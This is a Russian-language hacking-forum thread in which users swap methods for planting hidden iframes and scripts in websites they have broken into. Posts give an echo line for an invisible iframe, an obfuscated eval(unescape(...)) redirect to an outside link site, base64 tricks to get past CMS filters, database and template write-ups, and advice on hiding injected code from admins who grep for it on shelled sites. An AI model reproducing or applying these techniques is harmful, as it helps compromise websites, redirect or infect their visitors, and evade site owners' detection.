XaCeRoC, если ты хочешь профреймить php скрипт - то надо добавлять фрейм или после ?> или между <??> но с помощью echo '<iframe....';
Я в чистый HTML добавляю как на 2 рисунке и он секунд 20 работает потом кудато изчезает странным образом
Хм... А точно не админ убирает? У меня такого никогда не было. Попробуй вставить iframe не через админку, а напрямую через БД.
ага это точно не админ убирает 100% да и у меня такова тоже не когда не было =( Там короче что то стоит так как вот сделал эксперимент тока что удалил нтмл код из меню прошло несколько сек и меню вернулось в начальный вид значит там какойто модуль стоит или еще что-то что возвращает все в исходный вид =(
Эммм... Никогда такого не видел Стукни в аську - посмотрим Кстати, не знаю с чем это связано, но если в index.php у некоторых CMS добавлять PHP: echo "<ifame..."; то скрипт не работает... приходилось делать PHP: echo(base64_decode("HJ3HkqNQEk..."));
Связано это скорее всего с тем что ты забываешь экранироать кавычки: PHP: echo "<ifame..."; В этом случае нужно экранировать все двойные кавычки: Code: echo "<ifame [COLOR=Red]\"[/COLOR]bla[COLOR=Red]\"[/COLOR]bla";
Теперь у меня проблема такая вставляю в контент фрейм от там сохранится но на самом сайте выводит к примеру если в ставить <script type="text/javascript"> eval(unescape('%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%69%64%65%6C%69%6E%6B%73%2E%63%6F%6D%2F%3F%39%31%6E%74%74%73%76%6C%68%6C%22%3B')); </script> то он выводит тока <script type="text/javascript"> eval</script> если просто <iframe то он вобще не чего не выводит хотя сохранено вобщем вопрос такой как еще можно замаскировать фрейм что бы его вставить?
Итак. Апаю тему. Появились следующие траблы. Стали попадаться такие сайты, в которых iframe просто нереально вставить. Джумла фильтруют любой вывод из БД, фильтруются все теги типа <iframe> и <script>. Они просто вырезаются. Фильтруется контент модулей и все остальное. Прав на запись в файлы нету! Оооочень нужно поставить iframe, выслушаю любые идеи!
Ну в таком случае сделай так: https://forum.antichat.ru/showpost.php?p=697864&postcount=10 Это конечно геморно, но сделав один раз - второй сделать будет уже легче) - там гарантировано будет выводиться все как надо, т.к. вывод будет из файла, туда и пхп код можно запихнуть.
Ммм... За этот способ спс. Кое-где получилось Ну а если вообще нету прав на запись? Вообще нету, ниодной папки!
Да но есть 1 проблема во всяком случае у меня не вышло сделать так как указано в том примере так как путь до темпла был слишком длинный и он не записывался весь в базу поэтому писалось ошибка что не может найти темпл =(
А тут такая фигня есть права на запись везде де мона! лезу в index.php вставляю iframe с заекранированимы кавычками сейвлю и во всем index.php появляются слеши перед кавычками и усе перестает работать! хелп, чо ето ?
Rubaka, если ты пишешь iframe внутри тегов <? ?>, то используй echo(): Code: echo "<iframe src='http://blah.com' style='visibility:none'></iframe>"; Или просто вставляй фрейм до или после этих тегов.
обробую спс! ехо писал Обробовал! не пмагает! Хотел просто Хелло вывести нифига! В footer.php прописал <?echo "Hello";?> При сохранении все кавычки и в ПХП коде и в html cлешами екранируются!Убрал все слеши руками засейвил не пмагает! если сохранить несколько раз кол-во слешей увеличевается! Вообщем непонятно!!! 2n0ne могу в ПМ тебе линк с шеллом кинуть,если канешна не прикрыли еще!сам глянешь чо за фигня
Rubaka, ты это "Hello" писал внутри тегов <? ?> или за ними? з.ы. просто может какой-то конфликт или ещё что-то. Попробуй внутри оригинальных <??> написать echo 'asd';
с промлемой разобрался с помошью base64decode encode! А чо при сейве просто добавляет екранирующие слеши непнятно!
Не используйте в своих скриптах/айфрейм-кодах слишком много base64_decode/encode, т.к. админы сейчас умные пошли, и как только палят айфрейм на сайте - то сразу проверяют грепом на base64, "выуживая" таким образом все вредные коды. п.с. Проверено на себе, потерял много шеллов